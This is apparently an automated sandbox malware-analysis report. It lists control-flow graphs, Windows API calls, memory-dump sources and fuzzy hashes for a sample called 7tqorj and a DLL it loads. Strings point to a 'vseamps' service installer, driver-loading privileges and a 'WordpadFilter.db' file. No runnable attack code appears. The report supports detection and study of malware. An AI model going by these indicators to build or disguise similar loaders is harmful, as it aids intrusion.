                                                    control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 261 1400075a3-1400075af 258->261 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 272 140007341-1400073de 264->272 273 14000756c-1400075a2 264->273 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 274 140007552 271->274 275 140007537-140007554 271->275 272->256 273->261 274->261 275->264
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                    • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                    • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                    • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: File$CreateReadmalloc
                                                    • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                    • API String ID: 3950102678-3381721293
                                                    • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                    • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                    • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                    • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 25 7ffda5801c00-7ffda5801c06 26 7ffda5801c08-7ffda5801c0b 25->26 27 7ffda5801c41-7ffda5801c4b 25->27 28 7ffda5801c35-7ffda5801c74 call 7ffda5802470 26->28 29 7ffda5801c0d-7ffda5801c10 26->29 30 7ffda5801d68-7ffda5801d7d 27->30 48 7ffda5801c7a-7ffda5801c8f call 7ffda5802304 28->48 49 7ffda5801d42 28->49 31 7ffda5801c28 __scrt_dllmain_crt_thread_attach 29->31 32 7ffda5801c12-7ffda5801c15 29->32 33 7ffda5801d8c-7ffda5801da6 call 7ffda5802304 30->33 34 7ffda5801d7f 30->34 40 7ffda5801c2d-7ffda5801c34 31->40 36 7ffda5801c17-7ffda5801c20 32->36 37 7ffda5801c21-7ffda5801c26 call 7ffda58023b4 32->37 46 7ffda5801ddb-7ffda5801e0c call 7ffda5802630 33->46 47 7ffda5801da8-7ffda5801dd9 call 7ffda580242c call 7ffda58022d4 call 7ffda58027b4 call 7ffda58025d0 call 7ffda58025f4 call 7ffda580245c 33->47 38 7ffda5801d81-7ffda5801d8b 34->38 37->40 59 7ffda5801e0e-7ffda5801e14 46->59 60 7ffda5801e1d-7ffda5801e23 46->60 47->38 57 7ffda5801d5a-7ffda5801d67 call 7ffda5802630 48->57 58 7ffda5801c95-7ffda5801ca6 call 7ffda5802374 48->58 52 7ffda5801d44-7ffda5801d59 49->52 57->30 75 7ffda5801ca8-7ffda5801ccc call 7ffda5802778 call 7ffda58022c4 call 7ffda58022e8 call 7ffda5807b10 58->75 76 7ffda5801cf7-7ffda5801d01 call 7ffda58025d0 58->76 59->60 64 7ffda5801e16-7ffda5801e18 59->64 65 7ffda5801e65-7ffda5801e6d call 7ffda5801720 60->65 66 7ffda5801e25-7ffda5801e2f 60->66 71 7ffda5801f02-7ffda5801f0f 64->71 77 7ffda5801e72-7ffda5801e7b 65->77 72 7ffda5801e36-7ffda5801e3c 66->72 73 7ffda5801e31-7ffda5801e34 66->73 78 7ffda5801e3e-7ffda5801e44 72->78 73->78 75->76 127 7ffda5801cce-7ffda5801cd5 __scrt_dllmain_after_initialize_c 75->127 76->49 99 7ffda5801d03-7ffda5801d0f call 7ffda5802620 76->99 84 7ffda5801eb3-7ffda5801eb5 77->84 85 7ffda5801e7d-7ffda5801e7f 77->85 80 7ffda5801e4a-7ffda5801e5f call 7ffda5801c00 78->80 81 7ffda5801ef8-7ffda5801f00 78->81 80->65 80->81 81->71 88 7ffda5801ebc-7ffda5801ed1 call 7ffda5801c00 84->88 89 7ffda5801eb7-7ffda5801eba 84->89 85->84 94 7ffda5801e81-7ffda5801ea3 call 7ffda5801720 call 7ffda5801d68 85->94 88->81 108 7ffda5801ed3-7ffda5801edd 88->108 89->81 89->88 94->84 122 7ffda5801ea5-7ffda5801eaa 94->122 115 7ffda5801d35-7ffda5801d40 99->115 116 7ffda5801d11-7ffda5801d1b call 7ffda5802538 99->116 113 7ffda5801ee4-7ffda5801ef2 108->113 114 7ffda5801edf-7ffda5801ee2 108->114 119 7ffda5801ef4 113->119 114->119 115->52 116->115 126 7ffda5801d1d-7ffda5801d2b 116->126 119->81 122->84 126->115 127->76 128 7ffda5801cd7-7ffda5801cf4 call 7ffda5807acc 127->128 128->76
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                    • Instruction ID: 02d09f5c6657c9baff9acf7620da907f915e7ffb855c764fda22da53ce31e26c
                                                    • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                    • Instruction Fuzzy Hash: B381D021F0B64B46F664AB7698713796290BF47F90F0442B5EA4E477D3DE7CE4468308

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                    • String ID: WordpadFilter.db
                                                    • API String ID: 868324331-3647581008
                                                    • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                    • Instruction ID: 9d1570ae14eff48e6b5a10e09d5430b5a894d92959e290bb6ccc5acace6caf62
                                                    • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                    • Instruction Fuzzy Hash: E7317C32B16B4589E700DBB1D8603AD73A5FB89B88F144675EE8D13B46EF38D151C344

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 196 7ffda58011b0-7ffda5801207 197 7ffda580124b-7ffda580124e 196->197 198 7ffda5801209-7ffda5801222 call 7ffda5811490 196->198 199 7ffda58014b8-7ffda58014bf 197->199 200 7ffda5801254-7ffda5801280 197->200 210 7ffda5801224-7ffda5801227 198->210 211 7ffda580123e 198->211 204 7ffda58014c3-7ffda58014ea call 7ffda5801b70 199->204 202 7ffda58012f6-7ffda5801335 call 7ffda5801b90 call 7ffda5810a50 200->202 203 7ffda5801282-7ffda580128f 200->203 231 7ffda5801340-7ffda58013cb 202->231 207 7ffda5801295-7ffda580129c 203->207 208 7ffda58014f1-7ffda58014f6 call 7ffda5801a40 203->208 213 7ffda58012c7-7ffda58012cf call 7ffda5801b90 207->213 214 7ffda580129e-7ffda58012a5 207->214 221 7ffda58014f7-7ffda58014ff call 7ffda5801110 208->221 216 7ffda5801229-7ffda580123c call 7ffda5811490 210->216 217 7ffda5801241-7ffda5801246 210->217 211->217 233 7ffda58012d2-7ffda58012f1 call 7ffda5810e10 213->233 220 7ffda58012ab-7ffda58012b3 call 7ffda5801b90 214->220 214->221 216->210 216->211 217->197 235 7ffda58014eb-7ffda58014f0 call 7ffda58079cc 220->235 236 7ffda58012b9-7ffda58012c5 220->236 231->231 234 7ffda58013d1-7ffda58013da 231->234 233->202 238 7ffda58013e0-7ffda5801402 234->238 235->208 236->233 241 7ffda5801404-7ffda580140e 238->241 242 7ffda5801411-7ffda580142c 238->242 241->242 242->238 244 7ffda580142e-7ffda5801436 242->244 245 7ffda5801498-7ffda58014a6 244->245 246 7ffda5801438-7ffda580143b 244->246 247 7ffda58014a8-7ffda58014b5 call 7ffda5801bcc 245->247 248 7ffda58014b6 245->248 249 7ffda5801440-7ffda5801449 246->249 247->248 248->204 251 7ffda580144b-7ffda5801453 249->251 252 7ffda5801455-7ffda5801465 249->252 251->252 254 7ffda5801467-7ffda580146e 252->254 255 7ffda5801470-7ffda5801496 252->255 254->255 255->245 255->249
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 73155330-0
                                                    • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                    • Instruction ID: f93ddd4b1d4e65f296a6983b5260eee663fd3e40ef209ac76df1cb99e322a264
                                                    • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                    • Instruction Fuzzy Hash: B7813A23B1AA8A46E6118B3598502B9A794FF57FD4F148335EF5953793DF3CE0918304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 3526400053-0
                                                    • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                    • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                    • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                    • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                    • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                    • API String ID: 3408796845-4213300970
                                                    • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                    • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                    • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                    • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                    • String ID: ampStopSingletone: logging ended
                                                    • API String ID: 2048888615-3533855269
                                                    • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                    • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                    • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                    • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                    • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                    • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                    • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastManagerOpen$FileModuleName
                                                    • String ID: /remove$/service$vseamps
                                                    • API String ID: 67513587-3839141145
                                                    • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                    • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                    • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                    • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                    • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                    • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                      • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Load$Library
                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                    • API String ID: 3981747205-232180764
                                                    • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                    • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                    • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                    • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                    • String ID:
                                                    • API String ID: 4284112124-0
                                                    • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                    • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                    • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                    • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                    • String ID: vseamps
                                                    • API String ID: 3693165506-3944098904
                                                    • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                    • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                    • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                    • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName
                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                    • API String ID: 514040917-4022980321
                                                    • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                    • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                    • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                    • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                    • String ID:
                                                    • API String ID: 2057259594-0
                                                    • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                    • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                    • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                    • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                    • String ID:
                                                    • API String ID: 3103264659-0
                                                    • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                    • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                    • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                    • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                    APIs
                                                    Memory Dump Source
